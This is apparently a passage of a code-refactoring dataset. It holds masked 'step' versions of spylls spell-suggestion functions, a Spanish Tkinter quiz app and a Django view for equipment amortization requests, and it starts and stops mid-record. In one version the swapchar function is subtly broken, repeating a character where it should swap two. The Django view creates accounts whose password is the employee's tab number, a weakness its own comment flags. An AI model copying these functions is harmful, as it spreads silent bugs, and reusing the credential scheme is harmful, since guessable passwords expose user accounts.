min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY 
<spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\ndef extrachar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char removed in all possible positions\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word)):\n yield word[:i] + word[i + 1:]\n\n\ndef forgotchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n if len(word) < 2:\n return\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos +\n MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos + 1:topos] + char + word[topos:\n ]\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1),\n frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[\n frompos + 1:]\n\n\ndef badchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY 
<spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\ndef doubletwochars(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n if len(word) < 5:\n return\n for i in range(2, len(word)):\n if word[i - 2] == word[i] and word[i - 3] == word[i - 1]:\n yield word[:i - 1] + word[i + 1:]\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-5": "\"\"\"\nNote: names of methods in this module, if seem weird, are the same as in Hunspell's ``suggest.cxx``\nto keep track of them.\n\"\"\"\n\nfrom typing import Iterator, Union, List, Set\n\nfrom spylls.hunspell.data import aff\n\n\nMAX_CHAR_DISTANCE = 4\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) -> Iterator[Union[str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n\n if len(word) < 2 or not reptable:\n return\n\n for pattern in reptable:\n # TODO: compiled at aff loading\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_', ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) -> Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. 
E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos+len(option):]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n\n for variant in mapchars_internal(word):\n yield variant\n\n\ndef swapchar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces\n also doubleswaps: ahev -> have.\n \"\"\"\n\n if len(word) < 2:\n return\n\n for i in range(0, len(word) - 1):\n yield word[:i] + word[i+1] + word[i+1] + word[i+2:]\n\n # try double swaps for short words\n # ahev -> have, owudl -> would\n if len(word) in [4, 5]:\n yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1] + word[-2]\n if len(word) == 5:\n yield word[0] + word[2] + word[1] + word[-1] + word[-2]\n\n\ndef longswapchar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(word))):\n yield word[:first] + word[second] + word[first+1:second] + word[first] + word[second+1:]\n\n\ndef badcharkey(word: str, layout: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental 
uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i+1:]\n if c != c.upper():\n yield before + c.upper() + after\n\n if not layout:\n continue\n\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos-1] != '|':\n yield before + layout[pos-1] + after\n if pos + 1 < len(layout) and layout[pos+1] != '|':\n yield before + layout[pos+1] + after\n pos = layout.find(c, pos+1)\n\n\ndef extrachar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with one char removed in all possible positions\n \"\"\"\n if len(word) < 2:\n return\n\n for i in range(0, len(word)):\n yield word[:i] + word[i+1:]\n\n\ndef forgotchar(word: str, trystring: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n\n if not trystring:\n return\n\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n\n if len(word) < 2:\n return\n\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos + MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos+1:topos] + char + word[topos:]\n\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1), frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[frompos+1:]\n\n\ndef badchar(word: str, trystring: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by 
chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n\n if not trystring:\n return\n\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i+1:]\n\n\ndef doubletwochars(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n\n if len(word) < 5:\n return\n\n # TODO: 1) for vacacation yields \"vacation\" twice, hunspell's algo kinda wiser\n # 2) maybe just use regexp?..\n for i in range(2, len(word)):\n if word[i-2] == word[i] and word[i-3] == word[i-1]:\n yield word[:i-1] + word[i+1:]\n\n\ndef twowords(word: str) -> Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-ids": [
6,
9,
12,
13,
14
]
}
|
[
6,
9,
12,
13,
14
] |
import tkinter as tk
from tkinter import ttk, messagebox, Menu
# --- Module-level UI state (created at import time) ---
ventana = tk.Tk()  # main application window
EntryArr = []  # StringVars backing the free-text answer entries (filled in edicion1)
# Quiz prompts, in display order: indices 0-1 free text, 2-3 radio, 4 checkboxes.
Label = ["¿Que es la analisis psicologico?", "¿Como se lee la mente?", "¿Cuantas persepciones psicologicas existen?", "¿Padre de la Psicologia moderna?", "Parte del cuerpo donde esta la psyco"]
Arr3 = tk.IntVar()  # selection holder for the first radio question (rebound again below)
opciones1 = ["1", "2","5"]  # radio choices for question 3
opciones2 = ["John Lenon", "Leon Borrego", "Jefry", "mxrio"]  # radio choices for question 4
opciones3 = ["Cabeza", "mente", "Pecho", "corazon", "Manos"]  # checkbox choices for question 5
respuesta = dict.fromkeys(opciones3, None)  # checkbox label -> IntVar (assigned in edicion1)
def grid(Component, col, row1, padx1, pady1):
    """Place *Component* in its parent's grid at (row1, col) with padding."""
    placement = {"column": col, "row": row1, "padx": padx1, "pady": pady1}
    Component.grid(**placement)
def click():
    """Grade the quiz: validate the free-text answers, then score the radios.

    Shows an error dialog and aborts if any text entry is empty; otherwise
    awards 40 points for completed entries plus 20 for each correct radio
    answer, and reports the total in a message box.
    """
    cal = 0
    info = ""
    for idx, entry in enumerate(EntryArr):
        answer = entry.get()
        if not answer:
            messagebox.showinfo("Error", "Campos no llenos")
            return
        info += f"{Label[idx]}\t{answer}" + "\n"
        cal = 40
    if Arr3.get() == 1:
        cal += 20
    if Arr4.get() == 2:
        cal += 20
    messagebox.showinfo("resultados", "Tu calificaion es" + str(cal))
# Answer holders for the two radio-button questions; click() reads these
# module-level vars when grading. NOTE(review): Arr3 is also assigned near
# the top of the module -- this rebinding looks redundant; confirm intent.
Arr3 = tk.IntVar()
Arr4 = tk.IntVar()
def edicion1():
    """Build the quiz UI.

    Lays out two free-text questions (rows 0-1), two radio-button questions
    (rows 2-3), one checkbox question (rows 4-5), and the submit button that
    triggers grading via click().
    """
    # Free-text questions: one Entry + Label per prompt.
    indice = 0
    for i in range(0, 2):
        EntryArr.append(tk.StringVar())
        grid(
            ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, 10, 10)
        grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)
        indice += 1
    # First radio question.
    grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)
    icol = 1
    # BUGFIX: do NOT rebind Arr3 locally here. click() grades against the
    # module-level Arr3; a local tk.IntVar() would leave the buttons wired to
    # a variable the grader never sees, so this answer could never score.
    for i in range(0, 3):
        grid(ttk.Radiobutton(ventana, text = opciones1[i], variable=Arr3, value = i), icol, 2, 5, 5)
        icol += 1
    # Second radio question.
    icol = 1
    grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)
    for i in range(0, 4):
        grid(ttk.Radiobutton(ventana, text = opciones2[i], variable=Arr4, value = i), icol, 3, 5, 5)
        icol += 1
    # Checkbox question: one IntVar per option, stored in respuesta.
    grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)
    icol = 0
    for key in respuesta:
        respuesta[key] = tk.IntVar()
        ttk.Checkbutton(ventana, text = key, variable = respuesta[key]).grid(row = 5, column = icol)
        icol = icol + 1
    # Submit button runs the grader.
    Botton = tk.Button(ventana, text="Aceptar", command = click)
    grid(Botton, 2, 10, 10, 10)
def main():
    """Build the quiz widgets, then run the Tk event loop (blocks until the window closes)."""
    edicion1()
    ventana.mainloop()
main()  # script entry: builds and shows the quiz immediately on run/import
|
normal
|
{
"blob_id": "aeab80e2d0006ffa938366ef046d2ab3d387f88c",
"index": 1152,
"step-1": "<mask token>\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\n<mask token>\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\n<mask token>\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-3": "<mask token>\nventana = tk.Tk()\nEntryArr = []\nLabel = ['¿Que es la analisis psicologico?', '¿Como se lee la mente?',\n '¿Cuantas persepciones psicologicas existen?',\n '¿Padre de la Psicologia moderna?', 'Parte del cuerpo donde esta la psyco']\nArr3 = tk.IntVar()\nopciones1 = ['1', '2', '5']\nopciones2 = ['John Lenon', 'Leon Borrego', 'Jefry', 'mxrio']\nopciones3 = ['Cabeza', 'mente', 'Pecho', 'corazon', 'Manos']\nrespuesta = dict.fromkeys(opciones3, None)\n\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\nArr3 = tk.IntVar()\nArr4 = tk.IntVar()\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n 
edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-4": "import tkinter as tk\nfrom tkinter import ttk, messagebox, Menu\nventana = tk.Tk()\nEntryArr = []\nLabel = ['¿Que es la analisis psicologico?', '¿Como se lee la mente?',\n '¿Cuantas persepciones psicologicas existen?',\n '¿Padre de la Psicologia moderna?', 'Parte del cuerpo donde esta la psyco']\nArr3 = tk.IntVar()\nopciones1 = ['1', '2', '5']\nopciones2 = ['John Lenon', 'Leon Borrego', 'Jefry', 'mxrio']\nopciones3 = ['Cabeza', 'mente', 'Pecho', 'corazon', 'Manos']\nrespuesta = dict.fromkeys(opciones3, None)\n\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\nArr3 = tk.IntVar()\nArr4 = tk.IntVar()\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n 
grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-5": "import tkinter as tk\nfrom tkinter import ttk, messagebox, Menu\n\n\nventana = tk.Tk()\nEntryArr = []\nLabel = [\"¿Que es la analisis psicologico?\", \"¿Como se lee la mente?\", \"¿Cuantas persepciones psicologicas existen?\", \"¿Padre de la Psicologia moderna?\", \"Parte del cuerpo donde esta la psyco\"]\nArr3 = tk.IntVar()\nopciones1 = [\"1\", \"2\",\"5\"]\nopciones2 = [\"John Lenon\", \"Leon Borrego\", \"Jefry\", \"mxrio\"]\nopciones3 = [\"Cabeza\", \"mente\", \"Pecho\", \"corazon\", \"Manos\"]\nrespuesta = dict.fromkeys(opciones3, None)\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\ndef click():\n i = 0\n cal = 0\n info = \"\"\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo(\"Error\",\"Campos no llenos\")\n return\n else: \n info += (f\"{Label[i]}\\t{x.get()}\"+ \"\\n\")\n cal = 40\n i+= 1\n\n if(Arr3.get() == 1):\n cal+= 20\n if (Arr4.get() == 2):\n cal+= 20\n messagebox.showinfo(\"resultados\",\"Tu calificaion es\"+ str(cal) )\n\n\n\nArr3 = tk.IntVar()\nArr4 = tk.IntVar()\n\n\n\ndef edicion1():\n \n indice = 0\n for i in range(0,2):\n EntryArr.append(tk.StringVar())\n grid(\n ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0,3):\n grid(ttk.Radiobutton(ventana, text = opciones1[i], variable=Arr3, value = i), icol, 2, 5, 5)\n icol +=1\n \n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0,4):\n grid(ttk.Radiobutton(ventana, text = opciones2[i], variable=Arr4, value = i), icol, 3, 5, 5)\n icol +=1\n # Botton\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text = key, variable = respuesta[key]).grid(row = 5, column = icol)\n icol = icol 
+ 1 \n\n\n Botton = tk.Button(ventana, text=\"Aceptar\", command = click)\n grid(Botton, 2, 10, 10, 10)\n\n\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.models import User
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.template.context import Context
from django.utils.translation import ugettext_lazy as _
from account.models import Employee
from amortization import settings
from models import MenuItem
from task.forms import RequestForm
from task.models import Request, Task
__author__ = 'cm'
from django.template.loader import get_template
def base_context(request):
    """Build the template context shared by every page.

    Returns ``locals()``, so every local name below (including ``request``)
    becomes a template variable -- renaming any of them would silently
    change the context handed to templates.
    """
    author = settings.ADMINS[0][0]
    version = settings.VERSION
    csrf_token = get_token(request)
    media_url = settings.MEDIA_URL
    app_name = _('Amortization & Expertise')
    path = request.path
    # Defaults for anonymous visitors.
    logout = False
    employee = None
    usr = request.user
    # Anonymous users only see the non-staff menu entries.
    menu = MenuItem.objects.filter(for_staff=False).order_by('order')
    if usr.is_authenticated():
        logout = True
        employee = Employee.objects.filter(user=usr)
        if employee:
            employee = employee[0]
            if employee.user.is_staff:
                # Staff see the full menu, including staff-only items.
                menu = MenuItem.objects.order_by('order')
    return locals()
def main(request):
    """Landing page: show the amortization request form and handle submission.

    GET renders the form, pre-filled from the logged-in Employee when one
    exists. POST auto-provisions a Django User plus Employee profile keyed
    by tab number when needed, logs the visitor in, and records a new
    equipment Request.
    """
    c = base_context(request)
    template = get_template("index.html")
    c['title'] = _('Request')
    form = RequestForm()
    # Pre-fill the form for an already-known employee.
    user = request.user
    c['user'] = user
    if user.is_authenticated():
        e = Employee.objects.filter(user=user)
        if e:
            empl = e[0]
            form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl.tab_number, 'post': empl.post, 'cabinet': empl.cabinet})
        c['logout'] = True

    c['form'] = form

    if request.method == 'POST':
        postdata = request.POST.copy()
        form = RequestForm(request.POST)
        if form.is_valid():
            # NOTE(review): this lookup assumes tab_number uniquely
            # identifies an employee -- confirm a unique constraint exists.
            empl = Employee.objects.filter(tab_number = postdata.get('tab_number', 0))
            if not empl:
                # First visit for this tab number: create a Django account.
                if user.is_authenticated():
                    # Drop the current session before switching accounts.
                    logout(request)
                username = postdata.get('fio', 'error!')
                # NOTE(review): the password is the (guessable) tab number and
                # the e-mail is hard-coded -- flagging as a security concern.
                password = postdata.get('tab_number', 0)
                User.objects.create_user(username, '[email protected]', password)
                # Log the freshly created account in.
                new_user = authenticate(username=username, password=password)
                if new_user:
                    login(request, new_user)
                # Matching Employee profile for the new account.
                empl = Employee()
                empl.tab_number = postdata.get('tab_number', 0)
                empl.fio = postdata.get('fio', "error!")
                empl.user = new_user
                empl.post = postdata.get('post', '')
                empl.cabinet = postdata.get('cabinet', '0-000')
                empl.save()
                uid = empl
            else:
                # Known employee: re-authenticate with the stored credentials.
                uid = empl[0]
                user = authenticate(username=uid.user.username, password=uid.tab_number)
                if user:
                    login(request, user)
            # Record the equipment request itself.
            req = Request()
            req.user = uid
            req.number = postdata.get('number', '000000000000')
            req.device = postdata.get('device', 'NoName')
            req.serial = postdata.get('serial', '')
            req.year = postdata.get('year', '----')
            req.save()
            c['saved'] = True
        else:
            # Re-render with validation errors attached.
            c['form'] = form

    return HttpResponse(template.render(Context(c)))
|
normal
|
{
"blob_id": "11163dc99ee65ab44494c08d81e110e9c42390ae",
"index": 3130,
"step-1": "<mask token>\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n uid.tab_number)\n if user:\n login(request, user)\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-2": "<mask token>\n\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n return locals()\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n 